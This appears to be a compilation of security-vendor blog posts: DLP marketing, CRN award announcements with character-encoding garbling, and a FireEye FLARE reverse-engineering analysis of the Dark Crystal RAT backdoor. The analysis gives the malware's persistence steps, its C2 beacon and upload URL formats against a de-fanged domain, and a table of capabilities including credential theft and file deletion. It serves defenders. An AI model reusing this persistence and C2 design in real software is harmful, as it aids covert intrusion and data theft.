Based on this real-time registry key event, the malicious executable C:\Windows\Temp\legitservice.exe created the Windows service LegitWindowsService. If we investigated the surrounding registry keys, we might identify even more information about this malicious service.

Conclusion

The availability of real-time events designed for forensic analysis can fill in gaps that traditional forensic artifacts cannot on their own. Mandiant has seen great value in using real-time events during active-attacker investigations. We have used real-time events to determine the functionality of attacker utilities that were no longer present on disk, to determine users and source network addresses used during malicious remote desktop activity when expected corresponding event logs were missing, and more.

Check out our FireEye Endpoint Security page and Redline page for more information (as well as Redline on the FireEye Market), and take a FireEye Endpoint Security tour today.

How to Secure Your Data Everywhere? It’s Easy With Unified Cloud Edge

The need to protect sensitive data has two main drivers, privacy legislation and protection of intellectual property against external breaches and insider threat. 58% of the countries worldwide now have legislation in place; these will become more onerous over time.  Breaches and insider theft of data is a frequently reported topic in the media due to the steady stream of brand impacting, high-profile cases.  Breaches are expensive due to fines, loss of revenue and remediation costs.

Historically data protection via DLP was implemented on the end point and in the business’s network.  Both approaches have strengths and weaknesses; network DLP is unable to monitor the movement of sensitive data to USB memory sticks and end point DLP doesn’t offer some of the more sophisticated DLP capabilities that require a lot of memory and compute power.  Many customers deployed both enterprise DLP solutions.

Other vendors without enterprise DLP offerings have added “DLP-lite” capabilities to their products, predominantly email and web security products and some businesses have chosen those over enterprise DLP solutions.

This approach was sustainable before widespread adoption of the cloud.  95% of companies have or are adopting cloud services and 79% of them admit to storing sensitive data there.  Data is now everywhere, on laptops, servers, in sanctioned apps, in unsanctioned Shadow IT apps and moving from cloud to cloud.  Protecting data within the four walls of an organization is no longer sufficient.

Businesses, particularly those with a Cloud First strategy have responded to this challenge by introducing a CASB solution such as McAfee’s MVISION Cloud product.  Dependent on the product this can address some, or all, of these cloud adoption challenges – MVISION Cloud addresses them all.

The problem however is that some businesses are living with gaps in their protection as they don’t deploy multiple products.  Endpoint DLP can’t solve for cloud, neither can cloud DLP solve for endpoint and web DLP can’t effectively solve for sanctioned apps allowing online collaboration, or endpoint.  When looking at common use cases along with potential DLP leak vectors you’ll appreciate why a single product isn’t a complete solution:

To attempt to address this, businesses deploy multiple products.  Doing so closes all the gaps but has downsides.  Multiple products are expensive to license, have higher IT management overheads and complexity due to subtly implementations.  These differences are due to different DLP policies, data classifications and content extraction engines which makes it difficult to ensure consistency of detection across products, as data classifications that have been fine-tuned over time have to be re-implemented from scratch with each additional product, leading to a reduction of efficacy.

McAfee’s Unified Cloud Edge (UCE) solution solves these problems.  UCE is a combination of endpoint DLP, web SaaS proxy and CASB, covering all the potential data leak vectors: endpoint, unsanctioned shadow IT apps, sanctioned apps (including email) and cloud to cloud transfers.  UCE is managed via a single console and uses the same DLP technology everywhere, such as policy and content extraction engines to maximize efficacy through consistent results.  Businesses can retain their investment in those carefully crafted data classifications, allowing use across all vectors and easy extension to the cloud.  UCE is a cloud native, highly scalable solution with industry leading uptime and availability.

Want to find out more? Listen to the webinar.

The post How to Secure Your Data Everywhere? It’s Easy With Unified Cloud Edge appeared first on McAfee Blogs.

NICE Webinar: The Continuity of Learning and Skills Development in Virtual Environments

The PowerPoint slides used during this webinar can be downloaded here. Speakers: James R. Stellar Professor of Behavioral Neuroscience, Department of Psychology, University at Albany, SUNY David Lasater Senior Director in Human Resources, Akamai Technologies Synopsis: One of the NICE Strategic Plan values is to Challenge Assumptions: Examine the rationale for past and present education, training, and workforce approaches and apply critical analysis to future solutions. Many organizations are rethinking past practices and seeking to “stimulate innovation” (another NICE value) as they transition

Veracode’s Leslie Bois, Robin Montague, and Lisa Quinby Earn Recognition on CRN 2020 Women of the Channel List

Leslie Bois, Veracode???s Vice President of Global Channels and Alliances, Robin Montague, Veracode's National Partner Director, and Lisa Quinby, Veracode???s Director of Global Field and Channel Marketing, have been recognized on the esteemed CRNツ?2020 Women of the Channel list. The annual list recognizes a select group of high-achieving women for their contributions to channel advocacy, growth, thought leadership, and dedication to the IT channel.

Leslie Boisツ?is responsible for global indirect channel sales growth. She develops and executes Veracode's global strategy to build a strong partner network that plays a significant role in the company's go-to-market efforts. Bois works cross-functionally to align all aspects of the business to support channel partners to grow their businesses with Veracode's leading application security solutions. A 15-year channel veteran in the software and IT industry, Leslie built her career developing highly successful partner organizations by building world-class channel teams, partner programs, and partner enablement.

This year, Bois led the transition to our channel-first initiative, which has helped us better enable partners to bring the Veracode platform to market. Driving new business through our partners has created new opportunities in markets in North America, Europe, the Middle East, Asia Pacific, and Latin America.

Aside from being selected for the CRNツ?2020 Women of the Channel list, Leslie Bois has also been named to CRN???s Most Powerful Women of the Channel 2020: Power 100 list. The Power 100 list is comprised of standout individuals selected from the annual CRN Women of the Channel list.

???I???m honored to be recognized on the CRNツ?2020 Women of the Channel list and Power 100 list,??? said Bois. ???I am confident we are the best application security provider in the world for channel partners to align with, and our SaaS-based platform means our partners have the ability to immediately get started with helping their customers address software security.???

Robin Montague is responsible for collaborating with our largest national partner to set and execute a joint strategy to drive incremental revenue. This involves coordinating efforts between our channel, partner, executive, sales, marketing, legal, finance, practice areas, and technical teams to cross-educate and build strong relationships.

Over the past year, Montague launched "Software Assurance," an offering that helps our customers eliminate risk and remove roadblocks to faster innovation and larger revenues. As the offering was developed, she collaborated with Veracode leaders and departments to not only advance Veracode's award-winning application security solutions but to marry them with the strength of our partner's world-class AppSec expertise and to expand our footprint in the market. The result was a much stronger awareness within Veracode of the value that a Channel partner can bring to our sales and innovation environment.

???It???s a wonderful honor to be recognized on the CRNツ?2020 Women of the Channel list for the third year in a row,??? said Montague. ???Increasing Channel utilization through the development of innovative partner services is key for me.???

Lisa Quinby is in charge of driving Veracode???s global partner marketing strategy, programs and communications. She works closely with Veracode???s entire ecosystem of partners to implement marketing plans, drive demand generation programs, and manage and oversee their participation in the Veracode Partner Program.

This year, Quinby supported the growth of our channel business by refining the onboarding process, developing our channel sales and marketing toolkits, and developing relationships with partners in EMEA, LATAM, and APJ. Under Quinby???s leadership, we???ve seen more engagement from our partners across the globe, including a continued increase in opportunities brought forward by partners.

Quinby has also been named to CRNs The 100 People You Don???t Know But Should list and received her certification as an IPED Channel Master.ツ?

???I am thrilled to once again be recognized on the CRN Women of the Channel list,??? said Quinby. ???Driving increased marketing engagement with our partners, delivering innovative co-marketing programs, and supporting partner enablement is top of mind for me in the year ahead.???

This prestigious list honors channel leaders who are paving the way for future generations with their innovative ideas and achievements. These women come from all areas of the IT ecosystem and are dedicated to the partner community.

???CRN???s 2020 Women of the Channel list recognizes an accomplished group of influential women leaders whose strategic vision and unique achievements accelerate channel growth through cultivated partnerships, innovative thought leadership, and unwavering dedication to the IT channel,??? said Bob Skelley, CEO of The Channel Company. ???We are proud to honor them for their accomplishments and contributions to driving channel success.???

The full list of CRNツ?2020 Women of the Channel can be found onツ?www.CRN.com/WOTC.

Visitツ?hereツ?to find out more about partnering with Veracode.

leslierobinlisa

McAfee Recognized on CRN’s 2020 Women of the Channel

Every year CRN recognizes the women who are leading the channel and their unique strengths, vision, and achievements. This prestigious, annual list acknowledges channel leaders who are blazing a trail for future generations. These women are from all areas of the IT ecosystem, including technology vendors, distributors, solution providers, and other IT organizations.

This year, we’re proud to recognize the six outstanding individuals who have been selected by CRN to be part of the 2020 Women of the Channel (WOTC) list. Each is recognized for her outstanding leadership, vision and unique role in driving channel growth and innovation.

If that weren’t exciting enough, we’re thrilled to share that Chari Rhoades received the honor of being named to CRN’s WOTC Power 100 List. The Power 100 List is a subset of the 900+ women recognized and highlights the women who are leading their organization from a variety of backgrounds and experiences. See below to learn more about each McAfee honoree.

Chari Rhoades – Director, Channel Operations and Distribution – Americas

Chari Rhoades joined McAfee in 2013 and currently leads two teams. One team focuses on the growth and development of our distribution partners. The second team is responsible for the enablement and communications to the Americas’ partners. In 2019, Chari led her distribution team to focus on executing the plan to ensure new business growth via targeted campaigns, enablement activities and leveraging key distribution services resulting in a material contribution to bookings for the channel. Chari contributed to the development and launch of the McAfee Channel Promise that defines who the channel is to McAfee and its internal teams while articulating the value of the channel. She also led the development of an internal training to ensure McAfee’s own sellers understand the channel and how to engage the channel for mutual success.

Kristin Carnes – Director, Global Channel Programs and Operations

Kristin Carnes joined McAfee through the acquisition of Skyhigh Networks. As Director of Global Channel Programs and Operations she supports a robust partner community that represents sales for more than 90% of the McAfee Enterprise business. In 2019, she accelerated McAfee’s investment in the PRM platform which gives partners a more comprehensive, simple view of their business with McAfee. In addition, she launched a new rebate program that provides predictability and greater earning potential for partners.

Gabriela Ferado – Manager, Channel Sales

Gabriela Ferado has been with McAfee for eight years and started as a sales rep with the Latin America team before joining the Channel team where she has learned, grown, and found a passion to help partners be a multiplying force for the company. As a former teacher, sharing knowledge and enabling others is an integral part of what she does and thrives on. In 2019, as part of the Cloud Service Provider team, she extended McAfee’s channel efforts to Latin America which helped our teams understand the CSPs as another route to market

Judy Kent – Director, Global Channel Programs and Communications

Judy Kent joined McAfee through the acquisition of Skyhigh Networks bringing more than 25 years of channel marketing and sales experience. In her role leading the global partner incentive programs she has driven new business revenue through the channel and has trained thousands of partners in a pre-sales technical enablement global webinar series. In addition, in January 2020, she successfully launched a new 13 language McAfee Partner Portal. She was previously recognized on CRN’s list of Women in the Channel in 2015 and 2016, and was recognized on CRN’s list of Channel Chiefs in 2016 and 2018.

Sheri Leach – Senior Distribution Account Manager

Sheri Leach has more than 25 years of experience working with distribution partners and has spent the last 14 years growing Ingram Micro with their McAfee business. In 2019, Sheri played a key role in working with Ingram Micro and delivering a Business Intelligence program that helped achieve net new logos which was one of McAfee’s 2019 initiatives. In addition, she played an integral role in developing operational excellence and automation within Ingram Micro when McAfee implemented their CPQ enhancement. She was also tightly aligned with Ingram Micro’s marketing team on the creation of a “no touch” McAfee sales program via demand generation and product attachment. Finally, Sheri helped facilitate a creative finance program between Ingram Micro and McAfee to bring in deals that would not have been possible before.

Natalie Tomlin – Director, Channel Sales Cloud and Service Providers

Natalie Tomlin is a McAfee veteran who joined when the company was known as Network Associates more than 20 years ago. She has held roles in sales and channel sales and has been a Channel Director for the past four years. In 2019, Natalie developed strong business relationships with the top Cloud Service Providers as they helped their customers on their journey to the cloud as a de facto security provider, facilitated discussions for operational efficiencies so McAfee can transact with the CSPs in both public and gov cloud, and brought in incremental revenue from the channel.

This recognition is special and underscores the work that we’ve done as an organization to hire diverse talent, implement a return to workplace initiative to assist people who have paused their careers, and achieve gender pay parity across the company.

Please join me in congratulating these six outstanding women who are at the core of the McAfee Channel program. Their leadership and execution have been paramount to our success and will continue to help lead us onwards.

The post McAfee Recognized on CRN’s 2020 Women of the Channel appeared first on McAfee Blogs.

Analyzing Dark Crystal RAT, a C# Backdoor

The FireEye Mandiant Threat Intelligence Team helps protect our customers by tracking cyber attackers and the malware they use. The FLARE Team helps augment our threat intelligence by reverse engineering malware samples. Recently, FLARE worked on a new C# variant of Dark Crystal RAT (DCRat) that the threat intel team passed to us. We reviewed open source intelligence and prior work, performed sandbox testing, and reverse engineered the Dark Crystal RAT to review its capabilities and communication protocol. Through publishing this blog post we aim to help defenders look for indicators of compromise and other telltale signs of Dark Crystal RAT, and to assist fellow malware researchers new to .NET malware, or who encounter future variants of this sample.

Discovering Dark Crystal RAT

The threat intel team provided FLARE with an EXE sample, believed to contain Dark Crystal RAT, and having the MD5 hash b478d340a787b85e086cc951d0696cb1. Using sandbox testing, we found that this sample produced two executables, and in turn, one of those two executables produced three more. Figure 1 shows the relationships between the malicious executables discovered via sandbox testing.


Figure 1: The first sample we began analyzing ultimately produced five executables.

Armed with the sandbox results, our next step was to perform a triage analysis on each executable. We found that the original sample and mnb.exe were droppers, that dal.exe was a clean-up utility to delete the dropped files, and that daaca.exe and fsdffc.exe were variants of Plurox, a family with existing reporting. Then we moved to analyzing the final dropped sample, which was dfsds.exe. We found brief public reporting by @James_inthe_box on the same sample, identifying it as DCRat and as a RAT and credential stealer. We also found a public sandbox run that included the same sample. Other public reporting described DCRat, but actually analyzed the daaca.exe Plurox component bundled along with DCRat in the initial sample.

Satisfied that dfsds.exe was a RAT lacking detailed public reporting, we decided to perform a deeper analysis.

Analyzing Dark Crystal RAT

Initial Analysis

Shifting aside from our sandbox for a moment, we performed static analysis on dfsds.exe. We chose to begin static analysis using CFF Explorer, a good tool for opening a PE file and breaking down its sections into a form that is easy to view. Having viewed dfsds.exe in CFF Explorer, as shown in Figure 2, the utility showed us that it is a .NET executable. This meant we could take a much different path to analyzing it than we would on a native C or C++ sample. Techniques we might have otherwise used to start narrowing down a native sample’s functionality, such as looking at what DLLs it imports and what functions from those DLLs that it uses, yielded no useful results for this .NET sample. As shown in Figure 3, dfsds.exe imports only the function _CorExeMain from mscoree.dll. We could have opened dfsds.exe in IDA Pro, but IDA Pro is usually not the most effective way of analyzing .NET samples; in fact, the free version of IDA Pro cannot handle .NET Common Language Infrastructure (CLI) intermediate code.


Figure 2: CFF Explorer shows that dfsds.exe is a .NET executable.


Figure 3: The import table for dfsds.exe is not useful as it contains only one function.

Instead of using a disassembler like IDA Pro on dfsds.exe, we used a .NET decompiler. Luckily for the reverse engineer, decompilers operate at a higher level and often produce a close approximation of the original C# code. dnSpy is a great .NET decompiler. dnSpy’s interface displays a hierarchy of the sample’s namespaces and classes in the Assembly Explorer and shows code for the selected class on the right. Upon opening dfsds.exe, dnSpy told us that the sample’s original name at link time was DCRatBuild.exe, and that its entry point is at <PrivateImplementationDetails>{63E52738-38EE-4EC2-999E-1DC99F74E08C}.Main, shown in Figure 4. When we browsed to the Main method using the Assembly Explorer, we found C#-like code representing that method in Figure 5. Wherever dnSpy displays a call to another method in the code, it is possible to click on the target method name to go to it and view its code. By right-clicking on an identifier in the code, and clicking Analyze in the context menu, we caused dnSpy to look for all occurrences where the identifier is used, similar to using cross-references in IDA Pro.


Figure 4: dnSpy can help us locate the sample's entry point


Figure 5: dnSpy decompiles the Main method into C#-like code

We went to the SchemaServerManager.Main method that is called from the entry point method, and observed that it makes many calls to ExporterServerManager.InstantiateIndexer with different integer arguments, as shown in Figure 6. We browsed to the ExporterServerManager.InstantiateIndexer method, and found that it is structured as a giant switch statement with many goto statements and labels; Figure 7 shows an excerpt. This does not look like typical dnSpy output, as dnSpy often reconstructs a close approximation of the original C# code, albeit with the loss of comments and local variable names. This code structure, combined with the fact that the code refers to the CipherMode.CBC constant, led us to believe that ExporterServerManager.InstantiateIndexer may be a decryption or deobfuscation routine. Therefore, dfsds.exe is likely obfuscated. Luckily, .NET developers often use obfuscation tools that are somewhat reversible through automated means.


Figure 6: SchemaServerManager.Main makes many calls to ExporterServerManager.InstantiateIndexer


Figure 7: ExporterServerManager.InstantiateIndexer looks like it may be a deobfuscation routine

Deobfuscation

De4dot is a .NET deobfuscator that knows how to undo many types of obfuscations. Running de4dot -d (for detect) on dfsds.exe (Figure 8) informed us that .NET Reactor was used to obfuscate it.

> de4dot -d dfsds.exe

de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot

Detected .NET Reactor (C:\...\dfsds.exe)

Figure 8: dfsds.exe is obfuscated with .NET Reactor

After confirming that de4dot can deobfuscate dfsds.exe, we ran it again to deobfuscate the sample into the file dfsds_deob.exe (Figure 9).

> de4dot -f dfsds.exe -o dfsds_deob.exe

de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot

Detected .NET Reactor (C:\Users\user\Desktop\intelfirst\dfsds.exe)
Cleaning C:\Users\user\Desktop\intelfirst\dfsds.exe
Renaming all obfuscated symbols
Saving C:\Users\user\Desktop\intelfirst\dfsds_deob.exe

Figure 9: de4dot successfully deobfuscates dfsds.exe

After deobfuscating dfsds.exe, we ran dnSpy again on the resulting dfsds_deob.exe. When we decompiled SchemaServerManager.Main again, the results were much different, as shown in Figure 10. Contrasting the new output with the obfuscated version shown previously in Figure 6, we found the deobfuscated code much more readable. In the deobfuscated version, all the calls to ExporterServerManager.InstantiateIndexer were removed; as suspected, it was apparently a string decoding routine. In contrast, the class names shown in the Assembly Explorer did not change; the obfuscator must have irrecoverably replaced the original class names with meaningless ones obtained from a standard list. Next, we noted that ten lines in Figure 10 hold base64-encoded data. Once the sample was successfully deobfuscated, it was time to move on to extracting its configuration and to follow the sample’s code path to its persistence capabilities and initial beacon.


Figure 10: Deobfuscating dfsds.exe shows that the method begins with some path manipulation and then accesses Base64-encoded data

Configuration, Persistence and Initial Beacon

Recall that in Figure 10 we found that the method SchemaServerManager.Main has a local variable containing Base64-encoded data; decoding that data revealed what it contains. Figure 11 shows the decoded configuration (with C2 endpoint URLs de-fanged):

> echo TUhvc3Q6aHR0cDovL2RvbWFsby5vbmxpbmUva3NlemJseGx2b3Uza2NtYnE4bDdoZjNmNGN5NXhnZW
80dWRsYTkxZHVldTNxYTU0LzQ2a3FianZ5a2x1bnAxejU2dHh6a2hlbjdnamNpM2N5eDhnZ2twdHgy
NWk3NG1vNm15cXB4OWtsdnYzL2FrY2lpMjM5bXl6b24weHdqbHhxbm4zYjM0dyxCSG9zdDpodHRwOi
8vZG9tYWxvLm9ubGluZS9rc2V6Ymx4bHZvdTNrY21icThsN2hmM2Y0Y3k1eGdlbzR1ZGxhOTFkdWV1
M3FhNTQvNDZrcWJqdnlrbHVucDF6NTZ0eHpraGVuN2dqY2kzY3l4OGdna3B0eDI1aTc0bW82bXlxcH
g5a2x2djMvYWtjaWkyMzlteXpvbjB4d2pseHFubjNiMzR3LE1YOkRDUl9NVVRFWC13TGNzOG8xTlZF
VXRYeEo5bjl5ZixUQUc6VU5ERUY= | base64 -d

MHost:hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/
46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjl
xqnn3b34w,BHost:hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91
dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239
myzon0xwjlxqnn3b34w,MX:DCR_MUTEX-wLcs8o1NVEUtXxJ9n9yf,TAG:UNDEF

Figure 11: Decoding the base64 data in SchemaServerManager.Main reveals a configuration string

Figure 11 shows that the data decoded to a configuration string containing four values: MHost, BHost, MX, and TAG. We analyzed the code that parses this string and found that MHost and BHost were used as its main and backup command and control (C2) endpoints. Observe that the MHost and BHost values in Figure 11 are identical, so this sample did not have a backup C2 endpoint.

In dnSpy it is possible to give classes and methods meaningful names just as it is possible to name identifiers in IDA Pro. For example, the method SchemaServerManager.StopCustomer picks the name of a random running process. By right-clicking the StopCustomer identifier and choosing Edit Method, it is possible to change the method name to PickRandomProcessName, as shown in Figure 12.


Figure 12: Assigning meaningful names to methods makes it easier to keep analyzing the program

Continuing to analyze the SchemaServerManager.Main method revealed that the sample persists across reboots. The persistence algorithm can be summarized as follows:

  1. The malware picks the name of a random running process, and then copies itself to %APPDATA% and C:\. For example, if svchost.exe is selected, then the malware copies itself to %APPDATA%\svchost.exe and C:\svchost.exe.
  2. The malware creates a shortcut %APPDATA%\dotNET.lnk pointing to the copy of the malware under %APPDATA%.
  3. The malware creates a shortcut named dotNET.lnk in the logged-on user’s Startup folder pointing to %APPDATA%\dotNET.lnk.
  4. The malware creates a shortcut C:\Sysdll32.lnk pointing to the copy of the malware under C:\.
  5. The malware creates a shortcut named Sysdll32.lnk in the logged-on user’s Startup folder pointing to C:\Sysdll32.lnk.
  6. The malware creates the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\scrss pointing to %APPDATA%\dotNET.lnk.
  7. The malware creates the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wininit pointing to C:\Sysdll32.lnk.

After its persistence steps, the malware checks for multiple instances of the malware:

  1. The malware sleeps for a random interval between 5 and 7 seconds.
  2. The malware takes the MD5 hash of the still-base64-encoded configuration string, and creates the mutex whose name is the hexadecimal representation of that hash. For this sample, the malware creates the mutex bc2dc004028c4f0303f5e49984983352. If this fails because another instance is running, the malware exits.

The malware then beacons, which also allows it to determine whether to use the main host (MHost) or backup host (BHost). To do so, the malware constructs a beacon URL based on the MHost URL, makes a request to the beacon URL, and then checks to see if the server responds with the HTTP response body “ok.” If the server does not send this response, then the malware unconditionally uses the BHost; this code is shown in Figure 13. Note that since this sample has the same MHost and BHost value (from Figure 11), the malware uses the same C2 endpoint regardless of whether the check succeeds or fails.


Figure 13: The malware makes an HTTP request based on the MHost URL to determine whether to use the MHost or BHost

The full algorithm to obtain the beacon URL is as follows:

  1. Obtain the MHost URL, i.e., hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54
    /46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239my
    zon0xwjlxqnn3b34w
    .
  2. Calculate the SHA1 hash of the full MHost URL, i.e., 56743785cf97084d3a49a8bf0956f2c744a4a3e0.
  3. Remove the last path component from the MHost URL, and then append the SHA1 hash from above, and ?data=active. The full beacon URL is therefore hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54
    /46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/56743785cf
    97084d3a49a8bf0956f2c744a4a3e0.php?data=active
    .

After beaconing the malware proceeds to send and receive messages with the configured C2.

Messages and Capabilities

After performing static analysis of dfsds.exe to determine how it selects the C2 endpoint and confirming the C2 endpoint URL, we shifted to dynamic analysis in order to collect sample C2 traffic and make it easier to understand the code that generates and accepts C2 messages. Luckily for our analysis, the malware continues to generate requests to the C2 endpoint even if the server does not send a valid response. To listen for and intercept requests to the C2 endpoint (domalo[.]online) without allowing the malware Internet access, we used FLARE’s FakeNet-NG tool. Figure 14 shows some of the C2 requests that the malware made being captured by FakeNet-NG.


Figure 14: FakeNet-NG can capture the malware's HTTP requests to the C2 endpoint

By comparing the messages generated by the malware and captured in FakeNet-NG with the malware’s decompiled code, we determined its message format and types. Observe that the last HTTP request visible in Figure 14 contains a list of running processes. By tracing through the decompiled code, we found that the method SchemaServerManager.ObserverWatcher.NewMerchant generated this message. We renamed this method to taskThread and assigned meaningful names to the other methods it calls; the resulting code for this method appears in Figure 15.


Figure 15: The method that generates the list of running processes and sends it to the C2 endpoint

By analyzing the code further, we identified the components of the URLs that the malware used to send data to the C2 endpoint, and how they are constructed.

Beacons

The first type of URL is a beacon, sent only once when the malware starts up. For this sample, the beacon URL was always hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzk
hen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/<hash>.php?data=active, where <hash> is the SHA1 hash of the MHost URL, as described earlier.

GET requests, format 1

When the malware needs to send data to or receive data from the C2, it sends a message. The first type of message, which we denote as “format 1,” is a GET request to URLs of the form hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqb
jvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn
3b34w/<hash>.php? type=__ds_setdata&__ds_setdata_user=<user_hash>&__ds_setdata_ext=<message_hash>&__ds_setdata_data=<message>
, where:

  • <hash> is MD5(SHA1(MHost)), which for this sample, is 212bad81b4208a2b412dfca05f1d9fa7.
  • <user_hash> is a unique identifier for the machine on which the malware is running. It is always calculated as SHA1(OS_version + machine_name + user_name) as provided by the .NET System.Environment class.
  • <message_hash> identifies what kind of message the malware is sending to the C2 endpoint. The <message_hash> is calculated as MD5(<message_type> + <user_hash>), where <message_type> is a short keyword identifying the type of message, and <user_hash> is as calculated above.
    • Values for <message_type> exist for each command that the malware supports; for possible values, see the “msgs” variable in the code sample shown in Figure 19.
    • Observe that this makes it difficult to observe the message type visually from log traffic, or to write a static network signature for the message type, since it varies for every machine due to the inclusion of the <user_hash>.
    • One type of message uses the value u instead of a hash for <message_hash>.
  • <message> is the message data, which is not obscured in any way.

The other type of ordinary message is a getdata message. These are GET requests to URLs of the form hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqb
jvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn
3b34w/<hash>.php? type=__ds_getdata&__ds_getdata_user=<user_hash>&__ds_getdata_ext=<message_hash>&__ds_getdata_key=<key>
, where:

  • <hash> and <user_hash> are calculated as described above for getdata messages.
  • <message_hash> is also calculated as described above for getdata messages, but describes the type of message the malware is expecting to receive in the server’s response.
  • <key> is MD5(<user_hash>).

The server is expected to respond to a getdata message with an appropriate response for the type of message specified by <message_hash>.

GET requests, format 2

A few types of messages from the malware to the C2 use a different format, which we denote as “format 2.” These messages are GET requests of the form hxxp://domalo[.]online /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gj
ci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/<user_hash>.<mes
sage_hash>
, where:

  • <user_hash> is calculated as described above for getdata messages.
  • <message_hash> is also calculated as described above for getdata messages, but describes the type of message the malware is expecting to receive in the server’s response. <message_hash> may also be the string comm.

Table 1 shows possible <message_types> that may be incorporated into <message_hash> as part of format 2 messages to instruct the server which type of response is desired. In contrast to format 1 messages, format 2 messages are only used for a handful of <message_type> values.

<message_type>

Response desired

s_comm

The server sends a non-empty response if a screenshot request is pending

m_comm

The server sends a non-empty response if a microphone request is pending

RDK

The server responds directly with keystrokes to replay

comm

The server responds directly with other types of tasking

Table 1: Message types when the malware uses a special message to request tasking from the server

POST requests

When the malware needs to upload large files, it makes a POST request. These POST requests are sent to hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqb
jvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn
3b34w/<hash>.php
, with the following parameters in the POST data:

  • name is <user_hash> + "." + <message_type>, where <user_hash> is calculated as described above and <message_type> is the type of data being uploaded.
  • upload is a file with the data being sent to the server.

Table 2 shows possible <message_type> values along with the type of file being uploaded.

<message_type>

Type of File

jpg

Screenshot

zipstealerlog

Cookie stealer log

wav

Microphone recording

file

Uploaded file

bmp

Webcam image

RD.jpg

Remote control screenshot

Table 2: Message types when files are uploaded to the server

Capabilities

By analyzing the code that handles the responses to the comm message (format 2), it was possible for us to inventory the malware’s capabilities. Table 3 shows the keywords used in responses along with the description of each capability.

Keyword

Description

shell

Execute a shell command

deleteall

Recursively delete all files from C:, D:, F:, and G:

closecd

Close the CD-ROM drive door

setwallpaper

Change the background wallpaper

ddos

Send TCP and UDP packets to a given host or IP address

logoff

Log off the current user

keyboardrecorder

Replay keystrokes as if the user had typed them

fm_newfolder

Create a new folder

fm_rename

Rename or move a file

desktopHide

Hide desktop icons

keyloggerstart

Start logging keystrokes

exec_cs_code

Compile and execute C# code

msgbox

Open a Windows MessageBox

fm_upload

Transfer a file from the C2 to the client

rdp

Re-spawn the malware running as an administrator

fm_zip

Build a ZIP file from a directory tree and transfer it from the client to the C2

webcam

Take a webcam picture

fm_unzip

Unzip a ZIP file to a given path on the client

keyloggerstop

Stop logging keystrokes

fm_drives

Enumerate drive letters

cookiestealer

Transfer cookies and browser/FileZilla saved credentials to the C2

fm_delete

Recursively delete a given directory

dismon

Hide desktop icons and taskbar

fm_uploadu

Transfer a file from the C2 to the client

taskstart

Start a process

cleardesktop

Rotate screen

lcmd

Run shell command and send standard output back to C2

taskbarShow

Show taskbar

clipboard

Set clipboard contents

cookiestealer_file

Save cookies and credentials to a local file

newuserpass

Create a new local user account

beep

Beep for set frequency and duration

speak

Use speech synthesizer to speak text

openchat

Open chat window

taskbarHide

Hide the taskbar

RDStart

Start remote control over user’s desktop

closechat

Close chat window

RDStop

Stop remote control over user’s desktop

fm_opendir

List directory contents

uninstall

Remove the malware from the client

taskkill

Kill a process

forkbomb

Endlessly spawn instances of cmd.exe

fm_get

Transfer a file from the client to the C2

desktopShow

Show desktop icons

Clipboardget

Transfer clipboard contents to C2

playaudiourl

Play a sound file

opencd

Open the CD-ROM drive door

shutdown

Shut down the machine

restart

Restart the machine

browseurl

Open a web URL in the default browser

Table 3: Capabilities of DCRat

Proof-of-Concept Dark Crystal RAT Server

After gathering information from Dark Crystal RAT about its capabilities and C2 message format, another way to illustrate the capabilities and test our understanding of the messages was to write a proof-of-concept server. Here is a code snippet that we wrote containing a barebones DCRat server written in Python. Unlike a real RAT server, this one does not have a user interface to allow the attacker to pick and launch commands. Instead, it has a pre-scripted command list that it sends to the RAT.

When the server starts up, it uses the Python BaseHTTPServer to begin listening for incoming web requests (lines 166-174). Incoming POST requests are assumed to hold a file that the RAT is uploading to the server; this server assumes all file uploads are screenshots and saves them to “screen.png” (lines 140-155). For GET requests, the server must distinguish between beacons, ordinary messages, and special messages (lines 123-138). For ordinary messages, __ds_setdata messages are simply printed to standard output, while the only __ds_getdata message type supported is s_comm (screenshot communications), to which the server responds with the desired screenshot dimensions (lines 63-84). For messages of type comm, the server sends four types of commands in sequence: first, it hides the desktop icons; then, it causes the string “Hello this is tech support” to be spoken; next, it displays a message box asking for a password; finally, it launches the Windows Calculator (lines 86-121).

Figure 16 shows the results when Dark Crystal RAT is run on a system that has been configured to redirect all traffic to domalo[.]online to the proof-of-concept server we wrote.


Figure 16: The results when a Dark Crystal RAT instance communicates with the proof-of-concept server

Other Work and Reconnaissance

